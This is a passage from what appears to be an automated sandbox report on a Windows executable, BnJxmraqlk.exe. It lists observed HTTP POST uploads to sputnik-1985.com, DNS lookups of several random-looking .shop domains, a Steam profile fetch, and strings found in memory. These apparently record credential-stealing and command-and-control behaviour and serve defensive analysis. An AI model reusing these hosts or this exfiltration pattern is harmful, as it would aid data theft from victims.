Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=5G3M9VPI83U93M4I1GM; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 586875; Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 77; Host: sputnik-1985.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: spottercurvei.click
Source: global traffic | DNS traffic detected: DNS query: nearycrepso.shop
Source: global traffic | DNS traffic detected: DNS query: abruptyopsn.shop
Source: global traffic | DNS traffic detected: DNS query: wholersorie.shop
Source: global traffic | DNS traffic detected: DNS query: framekgirus.shop
Source: global traffic | DNS traffic detected: DNS query: tirepublicerj.shop
Source: global traffic | DNS traffic detected: DNS query: noisycuttej.shop
Source: global traffic | DNS traffic detected: DNS query: rabidcowse.shop
Source: global traffic | DNS traffic detected: DNS query: cloudewahsj.shop
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: sputnik-1985.com
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: sputnik-1985.com
Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: BnJxmraqlk.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BnJxmraqlk.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: BnJxmraqlk.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: BnJxmraqlk.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: BnJxmraqlk.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: BnJxmraqlk.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: BnJxmraqlk.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: BnJxmraqlk.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: BnJxmraqlk.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: BnJxmraqlk.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: BnJxmraqlk.exe | String found in binary or memory: http://ocsp.sectigo.com0
Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: BnJxmraqlk.exe, 00000000.00000003.2268991081.0000000003C19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                    Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastl
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstati
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.co
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.co-
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.csF
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css
                    Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                    Source: BnJxmraqlk.exe, 00000000.00000003.2268991081.0000000003C19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                    Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2201713483.0000000003C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2201713483.0000000003C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2201713483.0000000003C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2268991081.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: BnJxmraqlk.exeString found in binary or memory: https://sectigo.com/CPS0
                    Source: BnJxmraqlk.exe, BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2295432665.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2285688248.0000000000F32000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2286149060.0000000000F32000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2350128906.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305113764.0000000000F22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
                    Source: BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/X
                    Source: BnJxmraqlk.exe, BnJxmraqlk.exe, 00000000.00000003.2266534657.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2339509497.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2304819049.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2267009156.0000000003C21000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2254231192.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2351060216.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2295477766.0000000000F11000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 